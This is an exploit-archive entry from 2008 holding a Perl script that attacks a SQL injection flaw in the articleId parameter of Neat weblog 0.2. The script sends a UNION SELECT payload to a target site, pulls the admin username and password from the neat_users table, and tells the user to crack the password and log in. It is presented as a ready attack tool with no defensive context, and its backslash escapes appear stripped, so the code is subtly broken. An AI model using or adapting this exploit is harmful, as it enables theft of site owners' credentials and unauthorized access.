[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Neat weblog 0.2 (articleId) Remote SQL Injection Vulnerability
# Published : 2008-03-31
# Author : IRCRASH
# Previous Title : Woltlab Burning Board Addon JGS-Treffen SQL Injection Vulnerability
# Next Title : Smoothflash (admin_view_image.php cid) SQL Injection Vulnerability
#!/usr/bin/perl
#####################################################################################
#### Neat weblog 0.2 ####
#### SQL Injection Exploit ####
#####################################################################################
# #
#Discovered by : IRCRASH (Dr.Crash) #
#Exploited By : Dr.Crash #
#IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm #
# #
#####################################################################################
# #
#Script Download : http://kent.dl.sourceforge.net/sourceforge/neat-web/neat0.2.zip #
# #
#####################################################################################
# < SQL > #
#SQL Address : http://Sitename/index.php?action=show&articleId=99999%27union/**/select/**/0,concat(user,0x120,password),2,3,4,5,6,7,8/**/from/**/neat_users/**/where+id=1/*
# #
#####################################################################################
# Our site : Http://IRCRASH.COM #
#####################################################################################
use LWP;
use HTTP::Request;
use Getopt::Long;
sub header
{
print "
****************************************************
* Neat weblog 0.2 Sql Injection exploit *
****************************************************
*AUTHOR : IRCRASH *
*Discovered by : IRCRASH (Dr.Crash) *
*Our Site : IRCRASH.COM *
****************************************************";
}
sub usage
{
print "
* Usage : perl $0 -url http://Sitename/
****************************************************
";
}
my %parameter = ();
GetOptions(%parameter, "url=s");
$url = $parameter{"url"};
if(!$url)
{
header();
usage();
exit;
}
if($url !~ ///){$url = $url."/";}
if($url !~ /http:///){$url = "http://".$url;}
$vul = "/index.php?action=show&articleId=99999%27union/**/select/**/0,concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),2,3,4,5,6,7,8/**/from/**/neat_users/**/where+id=1/*";
sub Exploit()
{
$requestpage = $url.$vul;
print "Requesting Page is ".$url."n";
my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
$req->referer($url);
$req->referer("http://IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
#Debug Modus delete # at beginning of next line
#print $content;
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0];
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/<endpass>/,$password);
$password = @password[0];
if(!$name && !$password)
{
print "nn";
print "!Exploit failed ! :(nn";
exit;
}
print "Username: ".$name."n";
print "Password: " .$password."nn";
print "Crack Password And Login In : $url/index.php?action=loginn";
print "Enjoy My friend .....n";
}
#Starting;
print "
****************************************************
* Neat weblog 0.2 Sql Injection exploit *
****************************************************
*AUTHOR : IRCRASH *
*Discovered by : IRCRASH (Dr.Crash) *
*Our Site : IRCRASH.COM *
****************************************************";
print "nnExploiting...n";
Exploit();
# www.Syue.com [2008-03-31]